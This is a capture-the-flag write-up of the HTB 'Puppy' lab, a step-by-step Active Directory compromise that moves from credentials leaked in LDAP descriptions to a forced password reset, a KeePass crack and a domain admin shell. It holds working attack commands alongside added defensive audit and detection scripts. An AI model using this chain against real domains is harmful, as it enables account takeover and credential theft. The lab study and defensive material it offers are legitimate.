Puppy
IP: 10.10.11.70 | Domain: puppy.htb | DC: dc.puppy.htb
Environment Setup
export IP=10.10.11.70
export VPN=$(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1)
echo "10.10.11.70 puppy.htb dc.puppy.htb" >> /etc/hosts
Step 1 — Port Scanning
Why: Identify open services. On a Windows box, Kerberos (88), LDAP (389), and SMB (445) together confirm a Domain Controller immediately. WinRM (5985) being open means valid credentials equal a shell — no need for MSF or complex lateral movement.
nmap -sCV -p- --min-rate 5000 $IP -oN nmap.out
Output:
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
Key findings:
- Confirmed Domain Controller — full AD port set
- WinRM (5985) open — any domain creds with remote access rights = shell
- No HTTP — pure AD attack surface
Step 2 — LDAP User Enumeration
Why: Anonymous or authenticated LDAP allows full enumeration of user objects and their attributes. Passwords stored in the description attribute are a pervasive misconfiguration in corporate AD environments — admins set a temporary password via the description field during provisioning and forget to remove it.
ldapsearch -x -H ldap://$IP -b "DC=puppy,DC=htb" "(objectClass=user)" sAMAccountName description
Output:
sAMAccountName: levi.james
description: <REDACTED>
Key findings:
- Valid credential found in description field: levi.james:<REDACTED>
- Password-in-description is a classic AD misconfiguration — often leftover from account provisioning
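The same enumeration, turned into a recurring audit: the script below is an added example (not part of this writeup and not output from the box) that parses ldapsearch-style LDIF, decodes the "attr:: base64" form ldapsearch uses for non-ASCII values, and flags descriptions that contain a credential keyword or a password-like token. The LDIF entries, the keyword list and the token heuristic are constructed assumptions; run it against a real export and review each hit by hand.

```python
"""Audit user description attributes for credential-like text (added example)."""
import base64
import re

# Constructed LDIF in the shape ldapsearch prints; not output from any real domain.
# The last entry carries a base64 value ("description::"), which ldapsearch emits
# for values that are not plain printable ASCII.
SAMPLE_LDIF = "\n".join([
    "# extended LDIF",
    "dn: CN=levi.james,OU=Staff,DC=example,DC=local",
    "sAMAccountName: levi.james",
    "description: Temp pass: Summer2024!",
    "",
    "dn: CN=jane.doe,OU=Staff,DC=example,DC=local",
    "sAMAccountName: jane.doe",
    "description: Finance analyst, started 2021",
    "",
    "dn: CN=svc_backup,OU=Service,DC=example,DC=local",
    "sAMAccountName: svc_backup",
    "description: pwd=B@ckup123 set by helpdesk",
    "",
    "dn: CN=bob.smith,OU=Staff,DC=example,DC=local",
    "sAMAccountName: bob.smith",
    "description:: " + base64.b64encode("Contraseña inicial: Winter2024".encode()).decode(),
    "",
])

# Assumed heuristics: a credential keyword, or a token of 8+ non-space chars mixing letters and digits.
KEYWORD = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?|secret|pin)\b", re.I)
TOKEN = re.compile(r"(?=\S*\d)(?=\S*[A-Za-z])\S{8,}")


def _decode(raw):
    """ldapsearch writes 'attr:: <base64>' for values that are not safe ASCII."""
    raw = raw.strip()
    if raw.startswith(":"):
        return base64.b64decode(raw[1:].strip()).decode("utf-8", "replace")
    return raw


def parse_ldif(text):
    """Split ldapsearch output into one dict per entry (comments skipped, folded lines joined)."""
    entries, cur, last = [], {}, None
    for line in text.splitlines():
        if line.startswith("#"):
            continue
        if not line.strip():
            if cur:
                entries.append({k: _decode(v) for k, v in cur.items()})
            cur, last = {}, None
            continue
        if line.startswith(" ") and last:   # folded continuation of the previous value
            cur[last] += line[1:]
            continue
        key, _, val = line.partition(":")
        cur[key] = val
        last = key
    if cur:
        entries.append({k: _decode(v) for k, v in cur.items()})
    return entries


def flag_descriptions(text):
    """Return (sAMAccountName, description, reason) for descriptions that look like they hold a credential."""
    hits = []
    for entry in parse_ldif(text):
        desc = entry.get("description", "")
        if KEYWORD.search(desc):
            hits.append((entry.get("sAMAccountName"), desc, "credential keyword"))
        elif TOKEN.search(desc):
            hits.append((entry.get("sAMAccountName"), desc, "password-like token"))
    return hits


if __name__ == "__main__":
    for name, desc, why in flag_descriptions(SAMPLE_LDIF):
        print(f"{name}: {why}: {desc}")
```

Feed it the file written by `ldapsearch ... > users.ldif` and pipe the hits into a ticket for the account owners; the description attribute is readable by every authenticated user, so anything flagged should be treated as already disclosed and rotated.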
Step 3 — BloodHound Enumeration
Why: With valid credentials, BloodHound maps every ACL, group membership, and attack path in the domain. GenericWrite over a user means you can set their scriptPath or abuse the attribute to force a password reset — a common path to privilege escalation from a low-privileged account.
bloodhound-python -u levi.james -p '<REDACTED>' -ns $IP -d puppy.htb -c all
Key findings:
- levi.james has GenericWrite over ant.edwards
- ant.edwards is a member of the HR group with access to sensitive shares
- Path: levi.james → GenericWrite → ant.edwards → HR share
Step 4 — ACL Abuse — GenericWrite → Force Password Change
Why: GenericWrite on a user object allows setting writable attributes including scriptPath. However, the most impactful abuse is forcing a password change via Set-DomainUserPassword (PowerView) or Impacket, giving immediate control of the target account without knowing their current password.
net rpc password ant.edwards '<REDACTED>' -U puppy.htb/levi.james%'<REDACTED>' -S $IP
Output:
# Successful — no error returned
Key findings:
- Password for ant.edwards reset without knowledge of the current password
- GenericWrite → password reset = instant account takeover
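On the defensive side, a reset like the one above lands in the DC's Security log as Event ID 4724 ("An attempt was made to reset an account's password") with the resetting principal as Subject and the victim as Target. The script below is an added example, not part of this writeup: it runs a simple detection over constructed, flattened 4724/4723/4738 records and alerts on any reset whose subject is outside an assumed helpdesk/admin allowlist. The event lines, the allowlist and the key=value layout are assumptions; real events come out of EVTX/XML and you would map the same four fields.

```python
"""Flag administrative password resets (Security Event ID 4724) performed by
principals that are not expected to reset other users' passwords.
Added example with constructed events; not output from any real DC."""
import re
from collections import Counter

# Constructed, flattened records in key=value form (real events are EVTX/XML).
SAMPLE_EVENTS = [
    "TimeCreated=2025-05-17T09:02:11Z EventID=4724 SubjectUserName=helpdesk01 SubjectDomainName=PUPPY TargetUserName=jane.doe TargetDomainName=PUPPY",
    "TimeCreated=2025-05-17T09:05:40Z EventID=4724 SubjectUserName=levi.james SubjectDomainName=PUPPY TargetUserName=ant.edwards TargetDomainName=PUPPY",
    "TimeCreated=2025-05-17T09:05:41Z EventID=4738 SubjectUserName=levi.james SubjectDomainName=PUPPY TargetUserName=ant.edwards TargetDomainName=PUPPY",
    "TimeCreated=2025-05-17T09:10:03Z EventID=4723 SubjectUserName=ant.edwards SubjectDomainName=PUPPY TargetUserName=ant.edwards TargetDomainName=PUPPY",
    "TimeCreated=2025-05-17T09:12:55Z EventID=4724 SubjectUserName=administrator SubjectDomainName=PUPPY TargetUserName=svc_backup TargetDomainName=PUPPY",
]

# Assumed allowlist: accounts whose role legitimately includes resetting other users' passwords.
RESET_ALLOWED = {"helpdesk01", "administrator"}

KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened record into a dict of its fields."""
    return dict(KV.findall(line))


def suspicious_resets(lines, allowed=RESET_ALLOWED):
    """Return (time, subject, target) for 4724 events whose subject is not an allowed resetter.

    4723 (user changed their own password) is ignored: it requires the old password and is
    self-service. 4738 (account changed) usually accompanies a reset and adds nothing here.
    """
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4724":
            continue
        subject = ev.get("SubjectUserName", "").lower()
        target = ev.get("TargetUserName", "").lower()
        if subject in allowed or subject == target:
            continue
        alerts.append((ev.get("TimeCreated"), subject, target))
    return alerts


def resets_per_subject(lines):
    """Count 4724 events by subject; any count for a non-admin is worth a look, a burst more so."""
    counts = Counter()
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") == "4724":
            counts[ev.get("SubjectUserName", "").lower()] += 1
    return counts


if __name__ == "__main__":
    for when, who, whom in suspicious_resets(SAMPLE_EVENTS):
        print(f"{when}: {who} reset the password of {whom} without a reset role")
    print(dict(resets_per_subject(SAMPLE_EVENTS)))
```

An alert from this rule is also a pointer to the root cause: a subject that can reset passwords but is not on the allowlist holds an ACL right (here GenericWrite) that the tiering model never meant to grant, so the fix is to remove the ACE, not just to rotate the target's password.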
Step 5 — SMB Enumeration as ant.edwards
Why: HR group membership typically maps directly to accessible shares. Internal HR shares are high-value targets — they frequently contain sensitive documents, employee data, and credential files (KeePass, Excel sheets, password-protected archives).
nxc smb $IP -u ant.edwards -p '<REDACTED>' --shares
smbclient //$IP/HR -U "puppy.htb/ant.edwards%<REDACTED>" -c "recurse ON; prompt OFF; mget *"
Output:
Share Permissions
----- -----------
HR READ,WRITE
NETLOGON READ
SYSVOL READ
Key findings:
- HR share accessible — found KeePass.kdbx (KeePass database)
- KeePass databases are encrypted but the master password may be crackable
Step 6 — KeePass Master Password Crack
Why: KeePass .kdbx files are protected by a master password, but the PBKDF2/AES encryption can be attacked offline with hashcat. Weak or dictionary-derived master passwords crack quickly against rockyou.
keepass2john KeePass.kdbx > keepass.hash
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt
Output:
KeePass.kdbx:<REDACTED>
Key findings:
- Master password cracked — database unlocked
- Contains Administrator credentials for the domain
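How cheap the offline attack is depends on the key-derivation settings in the .kdbx header: KDBX 3.x stores an AES-KDF transform-round count, KDBX 4 stores a KdfParameters dictionary for AES-KDF or Argon2. The script below is an added example (not part of this writeup and not KeePass's own code) that parses the outer header of a KeePass 2.x database and reports the KDF so that databases found on shares can be checked against a policy. The header field ids, VariantDictionary layout and KDF UUIDs follow the KDBX format as I know it; the sample headers are constructed in the block and the "weak" thresholds are assumptions to tune to your own baseline.

```python
"""Report the key-derivation settings of a KeePass 2.x (.kdbx) outer header.
Added example; the headers it parses are constructed below, no real database is read."""
import struct
import uuid

KDBX_SIG1, KDBX_SIG2 = 0x9AA2D903, 0xB54BFB67      # KeePass 2.x file signature
# KDF UUIDs as KeePass stores them: 16 raw bytes in canonical order (assumption noted in lead-in).
KDF_NAMES = {
    uuid.UUID("c9d9f39a-628a-4460-bf74-0d08c18a4fea"): "AES-KDF",
    uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c"): "Argon2d",
    uuid.UUID("9e298b19-56db-4773-b23d-fc3ec6f0a1e6"): "Argon2id",
}
VD_TYPES = {0x04: "<I", 0x05: "<Q", 0x0C: "<i", 0x0D: "<q"}   # VariantDictionary numeric types


def read_variant_dict(buf):
    """Decode a KDBX4 VariantDictionary: u16 version, typed entries, 0x00 terminator."""
    pos, out = 2, {}
    while buf[pos] != 0:
        vtype = buf[pos]; pos += 1
        (nlen,) = struct.unpack_from("<i", buf, pos); pos += 4
        name = buf[pos:pos + nlen].decode("utf-8"); pos += nlen
        (vlen,) = struct.unpack_from("<i", buf, pos); pos += 4
        raw = bytes(buf[pos:pos + vlen]); pos += vlen
        if vtype in VD_TYPES:
            out[name] = struct.unpack(VD_TYPES[vtype], raw)[0]
        elif vtype == 0x08:
            out[name] = raw[0] != 0
        elif vtype == 0x18:
            out[name] = raw.decode("utf-8")
        else:                      # 0x42 byte array: UUIDs, seeds, salts
            out[name] = raw
    return out


def inspect_kdbx(data):
    """Return version and KDF parameters from the outer header (stops at EndOfHeader)."""
    sig1, sig2, version = struct.unpack_from("<III", data, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KeePass 2.x database")
    major = version >> 16
    info = {"version": major, "kdf": None, "rounds": None, "memory": None, "parallelism": None}
    pos = 12
    while True:
        fid = data[pos]; pos += 1
        if major >= 4:             # KDBX 4 uses a u32 field length, 3.x a u16
            (size,) = struct.unpack_from("<I", data, pos); pos += 4
        else:
            (size,) = struct.unpack_from("<H", data, pos); pos += 2
        field = data[pos:pos + size]; pos += size
        if fid == 0:               # EndOfHeader
            return info
        if fid == 6 and major < 4:         # TransformRounds: AES-KDF is the only KDF in 3.x
            info["kdf"] = "AES-KDF"
            info["rounds"] = struct.unpack("<Q", field)[0]
        elif fid == 11 and major >= 4:     # KdfParameters
            params = read_variant_dict(field)
            info["kdf"] = KDF_NAMES.get(uuid.UUID(bytes=params["$UUID"]), "unknown")
            info["rounds"] = params.get("R", params.get("I"))   # AES-KDF rounds or Argon2 iterations
            info["memory"] = params.get("M")                    # Argon2 memory in bytes
            info["parallelism"] = params.get("P")


def kdf_is_weak(info, min_aes_rounds=100_000, min_argon_memory=32 * 1024 * 1024):
    """Assumed audit thresholds; low round counts make offline guessing proportionally cheaper."""
    if info["kdf"] == "AES-KDF":
        return info["rounds"] < min_aes_rounds
    if info["kdf"] in ("Argon2d", "Argon2id"):
        return info["memory"] < min_argon_memory or info["rounds"] < 2
    return True


# --- constructed headers for demonstration (hypothetical databases) ---------------------
def _field3(fid, payload):
    return bytes([fid]) + struct.pack("<H", len(payload)) + payload


def _field4(fid, payload):
    return bytes([fid]) + struct.pack("<I", len(payload)) + payload


def build_v3_header(rounds):
    return (struct.pack("<III", KDBX_SIG1, KDBX_SIG2, 0x00030001)
            + _field3(6, struct.pack("<Q", rounds)) + _field3(0, b"\r\n\r\n"))


def build_v4_argon2_header(iterations, memory, parallelism):
    def ent(vtype, name, raw):
        return (bytes([vtype]) + struct.pack("<i", len(name)) + name.encode()
                + struct.pack("<i", len(raw)) + raw)
    vd = (struct.pack("<H", 0x0100)
          + ent(0x42, "$UUID", uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c").bytes)
          + ent(0x05, "I", struct.pack("<Q", iterations))
          + ent(0x05, "M", struct.pack("<Q", memory))
          + ent(0x04, "P", struct.pack("<I", parallelism))
          + b"\x00")
    return (struct.pack("<III", KDBX_SIG1, KDBX_SIG2, 0x00040000)
            + _field4(11, vd) + _field4(0, b"\r\n\r\n"))


if __name__ == "__main__":
    for hdr in (build_v3_header(6000), build_v4_argon2_header(2, 64 * 1024 * 1024, 2)):
        meta = inspect_kdbx(hdr)
        print(meta, "WEAK" if kdf_is_weak(meta) else "ok")
```

To audit a real file, replace the constructed header with `open(path, "rb").read()`; only the first kilobyte or so is needed. A low AES-KDF round count is exactly what makes the rockyou run above finish quickly, so the mitigation is two-fold: a master password that is not in any wordlist, and a KDF (Argon2 with sizable memory) that makes every guess expensive.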
Step 7 — Domain Admin
Why: With Administrator's plaintext password recovered from KeePass, WinRM gives a direct shell on the DC.
evil-winrm -i $IP -u Administrator -p '<REDACTED>'
Output:
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
puppy\administrator
🏴 MACHINE PWNED — DOMAIN ADMIN ACHIEVED
Credentials
levi.james:<REDACTED> # LDAP description field
ant.edwards:<REDACTED> # Force password reset (GenericWrite)
Administrator:<REDACTED> # KeePass database
Full Attack Chain
LDAP user enum → description field → levi.james:<REDACTED>
└─ BloodHound → GenericWrite on ant.edwards
└─ Force password reset → ant.edwards:<REDACTED>
└─ SMB HR share (READ) → KeePass.kdbx
└─ hashcat (rockyou) → master password cracked
└─ KeePass → Administrator:<REDACTED>
└─ Evil-WinRM → SYSTEM on DC
🏴 DOMAIN ADMIN
© 0xNRG — Puppy pwned